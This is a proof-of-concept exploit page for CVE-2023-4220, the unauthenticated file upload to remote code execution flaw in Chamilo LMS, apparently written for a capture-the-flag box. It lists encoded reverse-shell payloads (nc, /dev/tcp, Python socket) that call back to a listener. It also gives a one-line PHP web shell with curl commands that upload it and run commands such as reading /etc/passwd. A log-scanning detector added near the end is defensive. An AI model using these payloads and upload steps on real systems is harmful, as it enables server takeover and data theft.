POC details: a13489cb200bc6ce9dcfd1dc7f39c8ba9d57968f

Related vulnerability
Title: Chamilo LMS security vulnerability (CVE-2023-4220)
Description: Chamilo LMS is an open-source online learning and collaboration system from the Chamilo Association; it supports authoring course content, remote training and online quizzes. Chamilo LMS 1.11.24 and earlier are affected by an unrestricted file upload in the big-file upload handler at /main/inc/lib/javascript/bigupload/inc/bigUpload.php.
Description
CVE-2023-4220 Exploit
Introduction
<h1>CVE-2023-4220 Exploit</h1>

<h2>Chamilo LMS Unauthenticated Big Upload File Remote Code Execution</h2>

--------------------------------------------------------

<h2>Usage cve-2023-4220.sh</h2>

`./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>`

`./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1`

Note that the example passes a port number (80) as the fourth argument, which the usage line labels `<Local-IP>`: it is the port your listener is bound to on `<Local-HOST>`, not a second address. `<Payload>` selects one of the preset reverse shells listed in the help output, or 5 to enter your own.

```
./cve-2023-4220.sh -h                                 

Usage for RevShell: ./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>

Example: ./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1

Payload: 1 == rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.10.10%209001%20%3E%2Ftmp%2Ff

Payload: 2 == sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.10.10%2F9001%200%3E%261

Payload: 3 == nc%2010.10.10.10%209001%20-e%20sh

Payload: 4 == python3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.10.10%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27

Payload: 5 == Enter own Payload:
```
![Example](/permx033.png)

![Example](/permx028.png)

![Example](/permx030.png)

--------------------------------------------------------

<h2>Get RCE</h2>

```
# 1. one-line PHP web shell that runs whatever arrives in the "jiji" query parameter
echo '<?php system($_GET["jiji"]); ?>' > jiji.php

# 2. unauthenticated upload through the "post-unsupported" action; the file keeps its
#    original name and .php extension, no session or CSRF token required
curl -F 'bigUploadFile=@jiji.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

# 3. the files/ directory is served by the web server, so the upload executes as PHP
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=id'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=cat+/etc/passwd'
```

![Example](/permx034.png)

![Example](/permx035.png)

--------------------------------------------------------

<h2>Usage cve-2023-4220.py</h2>

![Example](/permx036.png)

--------------------------------------------------------

**Source: https://starlabs.sg/advisories/23/23-4220/**

```
$ echo '<?php system("id"); ?>' > rce.php
$ curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
$ curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
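For the defender's side of the same chain, an added example (not from the repository or the STAR Labs advisory) that scans a web-server access log for the two requests the exploit has to make: an unauthenticated `POST` to `bigUpload.php` with `action=post-unsupported`, followed by a request for a script file under `bigupload/files/`. The log lines are constructed for the example; the Apache/nginx "combined" log layout and the list of executable extensions are this example's assumptions.

```python
"""Detection of the CVE-2023-4220 chain in access logs (added example, not code
from the repository or the advisory).

Assumptions: Apache/nginx "combined" log format; the SCRIPT_EXT list.
SAMPLE_LOG is constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

UPLOAD_ENDPOINT = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
FILES_DIR = "/main/inc/lib/javascript/bigupload/files/"
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5", ".php7", ".phps")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client (10.10.14.14) running the chain from the page,
# one ordinary user downloading a video that was uploaded the normal way.
SAMPLE_LOG = """\
10.10.14.14 - - [05/Jul/2024:10:12:03 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 40 "-" "curl/8.4.0"
10.10.14.14 - - [05/Jul/2024:10:12:05 +0000] "GET /main/inc/lib/javascript/bigupload/files/jiji.php?jiji=id HTTP/1.1" 200 54 "-" "curl/8.4.0"
192.0.2.7 - - [05/Jul/2024:10:13:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/lecture.mp4 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.0.2.7 - - [05/Jul/2024:10:14:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""


def is_script(path):
    """True for names the PHP handler would execute (extension list is an assumption)."""
    return path.lower().endswith(SCRIPT_EXT)


def classify(line):
    """Return ("upload"|"webshell", ip, timestamp, target) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Stage 1: the unauthenticated upload action. Only POST carries a file.
    if (m["method"] == "POST" and url.path == UPLOAD_ENDPOINT
            and "post-unsupported" in parse_qs(url.query).get("action", [])):
        return ("upload", m["ip"], m["ts"], m["target"])
    # Stage 2: any script fetched from the world-readable upload directory.
    if url.path.startswith(FILES_DIR) and is_script(url.path):
        return ("webshell", m["ip"], m["ts"], m["target"])
    return None


def scan(log_text):
    """All suspicious hits in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


def confirmed_chains(hits):
    """Source IPs seen doing both stages: upload via the vulnerable action and script execution."""
    uploaded, executed = set(), set()
    for kind, ip, _ts, _target in hits:
        (uploaded if kind == "upload" else executed).add(ip)
    return uploaded & executed


def suspicious_files(names):
    """Script files sitting in the upload directory; pass os.listdir() of files/ on the host."""
    return sorted(n for n in names if is_script(n))


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(*hit)
    print("confirmed chain from:", ", ".join(sorted(confirmed_chains(hits))) or "none")
```

A single `post-unsupported` POST is already worth an alert on an unpatched 1.11.x install; the `files/` fetch confirms execution, and `suspicious_files` over the directory on disk finds shells that were dropped before logging was in place.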
File snapshot

```
[4.0K] /data/pocs/a13489cb200bc6ce9dcfd1dc7f39c8ba9d57968f
├── [1.0K] cve-2023-4220.py
├── [6.0K] cve-2023-4220.sh
├── [ 16K] permx028.png
├── [ 47K] permx030.png
├── [ 28K] permx033.png
├── [ 11K] permx034.png
├── [ 20K] permx035.png
├── [161K] permx036.png
└── [2.2K] README.md

0 directories, 9 files
```